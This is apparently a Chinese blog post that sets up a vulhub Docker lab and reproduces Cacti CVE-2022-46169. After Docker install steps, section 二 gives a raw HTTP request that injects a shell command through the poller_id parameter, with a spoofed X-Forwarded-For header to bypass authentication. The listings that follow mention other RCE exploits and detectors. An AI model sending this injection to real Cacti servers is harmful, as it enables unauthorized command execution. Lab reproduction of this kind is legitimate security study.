catcti的RCE复习

原创 于 2025-08-02 00:13:58 发布 · 409 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言

一、安装docker环境

1. 安装必要的依赖

在安装 Docker 之前,我们需要安装一些必要的依赖包。运行以下命令:

sudo apt install apt-transport-https ca-certificates curl software-properties-common

2. 添加 Docker 的官方 GPG 密钥

通过以下命令添加 Docker 的官方 GPG 密钥,以确保下载的软件包的完整性:

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

3. 添加 Docker 的 APT 源

接下来,我们需要添加 Docker 的 APT 源到您的系统中:

sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"

4. 更新 APT 包索引

添加源后,更新 APT 包索引:

sudo apt update

5. 安装 Docker CE

安装 Docker 社区版(Docker CE):

sudo apt install docker-ce

6. 验证 Docker 是否安装成功

安装完成后,您可以运行以下命令来验证 Docker 是否成功安装:

sudo systemctl status docker

 7.查看docker版本以及compose是否可用

docker version
docker compose version

 8.为实验作基础准备

1.克隆仓库
git clone https://github.com/vulhub/vulhub.git
 
2.如果失败开代理拉取
proxychains git clone https://github.com/vulhub/vulhub.git
 
3.进入要使用的漏洞环境目录下
cd vulhub/cacti/CVE-2022-46169
 
4.启动漏洞环境
proxychains3 docker-compose up -d

二、漏洞的复现

通过浏览器访问http://IP:8080会跳转到登录页面。使用admin/admin作为账号密码登录,并根据页面中的提示进行初始化。

初始化:

这个漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器。

 

 完成初始化后我们扮演攻击者的角色向catcti服务器发送命令注入攻击即可

x GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) 
Gecko/20100101 Firefox/91.0
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: closeUpgrade-Insecure-Requests: 1

sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
ubuntu(25.04)安装docker-ce的详细教程
人工智能
03-16 6706
默认情况下,只有root用户和docker组的用户才能运行Docker命令。我们可以将当前用户添加到docker组,以避免每次使用Docker时都需要使用sudo。ubuntu下自带了docker的库,不需要添加新的源。但是ubuntu自带的docker版本太低,需要先卸载旧的再安装新的。
ubutun安装 docker
a289237642的博客
07-29 830
# docker安装文档 ```sh $ sudo apt-get update $ sudo apt-get install \     apt-transport-https \     ca-certificates \     curl \     software-properties-common $ curl -fsSL https://download.docker.com/...
ubuntu 16.04 安装docker (阿里云镜像)
热门推荐
谢小军的专栏
03-01 1万+
Ubuntu 14.04 16.04 (使用apt-get进行安装) # step 1: 安装必要的一些系统工具 sudo apt-get update sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common # step 2: 安装GPG证书 curl -fsSL ...
Ubuntu 安装 Docker CE
qq_29520895的博客
09-09 932
Ubuntu 安装 Docker 以及 修改Docker存储目录
Ubuntu安装Docker-ce
m0_46495862的博客
08-17 1225
Ubuntu安装Docker-ce
精选资源
向日葵RCE漏洞一键批量自己检测工具
02-25
【标题】:“向日葵RCE漏洞一键批量自我检测工具” 在网络安全领域,"RCE"是"Remote Code Execution"的缩写,意为远程代码执行。这是一个非常严重的安全漏洞,允许攻击者在目标系统上执行任意代码,从而获得与系统...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
锐捷rce复现漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-16 1363
​锐捷 rce复现,请求路径/guest_auth/guestIsUp.php //锐捷rce复现漏洞 锐捷rce漏洞文件
Ubuntu安装docker-ce
XiChuan的博客
12-04 4528
docker在大型项目上使用范围很广,为了在Ubuntu自测docker,心血来潮,准备自己搭建docker进行测试。因为使用apt直接安装docker的版本比较低,在此按照官网的教程安装docker-ce。 1.卸载旧版本 较旧版本的Docker被称为docker或docker-engine,需要手动卸载掉。 sudo apt-get remove docker docker-engin...
Ubuntu18.04安装docker、docker-compose、
diqi0762的博客
04-16 2331
Ubuntu18.04下Docker CE安装 Docker版本分为两个:Docker Community Edition (CE)和 Docker Enterprise Edition (EE)。Docker CE社区版本适合个人用户使用。 Ubuntu18.04下安装Docker CE有如下几种主要方法,推荐方法一自动安装: 方法一: 1 使用官方脚本自...
在Ubuntu22.04.5上安装Docker-CE
howard2005的专栏
12-05 2618
本次实践涵盖从Ubuntu系统准备到Docker应用的多方面操作。首先通过`lsb_release -a`查看Ubuntu版本,为后续安装提供系统信息基础。接着详细展示Docker-CE安装步骤,包括系统工具安装、密钥处理、软件源写入与组件安装,还可按需指定版本。启动Docker服务后,成功运行测试容器验证其可用性。随后拉取Django镜像并创建运行容器,进一步在容器内查看Django版本。整个过程步骤清晰,有助于熟悉Ubuntu与Docker协同操作,为构建更复杂的容器化应用环境奠定基础。
Ubuntu Docker 安装
weixin_44585288的博客
07-30 4675
文章介绍了在Ubuntu上安装Docker的两中方式
ubuntu安装docker
jun1159046873的博客
04-11 929
# step 1: 安装必要的一些系统工具 sudo apt-get update sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common # step 2: 安装GPG证书 curl -fsSL http://mirrors.aliyun.com/docker-ce/...
Go实战全家桶之四十六: ubuntu安装docker-ce
最新发布
leijmdas的专栏
02-02 869
如果你在国内,可以使用国内的 Docker 镜像加速器来提高下载速度。完成以上步骤后,Docker CE 应该已经成功安装并配置好了!如果有任何问题,请随时告诉我。如果你希望以非 root 用户运行 Docker,可以将当前用户添加到。如果一切正常,你会看到一条欢迎消息,表示 Docker 已成功安装并运行。默认情况下,Docker 需要。然后,注销并重新登录以应用更改。安装一些必要的依赖包,以允许。
Ubuntu 20.04安装Docker
zls365365的博客
08-22 2250
Docker学习系列文章入门必备:十本你不容错过的Docker入门到精通书籍推荐????day1、全面的Docker快速入门教程????day2、CentOS 8.4安装Docker????day3、Windows10 Docker安装详细教程????Docker是什么?  Docker 是一个开源的应用容器引擎,基于 Golang 语言开发,可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任...
docker安装
我要出家当道士
09-14 272
ubuntu18.04环境下docker的安装
西班牙语版Logo 230RCE用户手册
资源摘要信息:"Logo_s 230RCE_spanish_Logo230RCE_" 知识点: 1. Logo 230RCE 的含义:根据标题,Logo 230RCE 可能是一款设备或产品的型号,同时它还具有西班牙语的手册。"Logo"通常指的是标识或徽标,在这里它可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值